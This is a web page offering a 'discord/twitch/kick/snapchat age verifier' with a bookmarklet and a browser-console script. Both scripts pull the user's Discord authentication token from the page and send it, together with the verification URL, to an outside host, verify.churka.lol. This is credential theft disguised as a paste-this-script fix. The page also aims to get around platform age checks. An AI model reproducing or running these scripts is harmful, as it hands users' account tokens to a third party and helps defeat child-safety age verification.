discord/twitch/kick/snapchat age verifier

age verifies your account automatically as an adult on any website using k-id

made by 5425

verify discord (mobile — no pc needed)

1. open discord.com/app in your mobile browser and log in
2. bookmark any page
3. edit the bookmark and replace the URL with the script below:

javascript:void((()=>{const t=(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken();fetch('https://discord.com/api/v9/age-verification/verify',{method:'POST',headers:{'Content-Type':'application/json','Authorization':t},body:JSON.stringify({method:3})}).then(r=>r.json()).then(d=>window.location.href='https://verify.churka.lol/webview?url='+encodeURIComponent(d.verification_webview_url)+'&dt='+encodeURIComponent(t)).catch(e=>alert('error: '+e))})())

4. go to discord.com/app and tap the bookmark
5. wait for the verification page to say success

done! your account is verified.

verify discord (token method)

if you already have your discord token, paste it below:

verify discord (console method — pc only)

go to discord.com/app, press F12, go to Console and paste this script (type "allow pasting" first if needed):

let webpackRequire = webpackChunkdiscord_app.push([[Symbol()],{},(r) => r]);
webpackChunkdiscord_app.pop();

let modules = webpackRequire.m;
let cache = webpackRequire.c;

function findByCode(src) {
  for (const [id, mod] of Object.entries(modules)) {
    if (mod.toString().includes(src)) {
      return cache[id].exports;
    }
  }
}

function findObjectFromKey(exports, key) {
  if (!exports) return;
  for (const exportKey in exports) {
    const obj = exports[exportKey];
    if (obj && obj[key]) return obj;
  }
}

const api = findObjectFromKey(
  findByCode('.set("X-Audit-Log-Reason",'),
  "patch",
);

const request = await api.post({
  url: "/age-verification/verify",
  body: { method: 3 },
});
const verificationUrl = request.body.verification_webview_url;

// get discord token from cached modules
let discordToken;
for (const id in cache) {
  const mod = cache[id]?.exports;
  if (mod?.default?.getToken) {
    const t = mod.default.getToken();
    if (typeof t === 'string') { discordToken = t; break; }
  }
  if (mod?.getToken) {
    const t = mod.getToken();
    if (typeof t === 'string') { discordToken = t; break; }
  }
}
window.location.href = `https://verify.churka.lol/webview?url=${encodeURIComponent(verificationUrl)}&dt=${encodeURIComponent(discordToken)}`;

it should redirect you to a verification page — wait until it says success.

how to verify on other platforms (twitch, kick, snapchat, ...others)

navigate to the age verification page and choose selfie, then get the url of the qr code and put it in the input box below: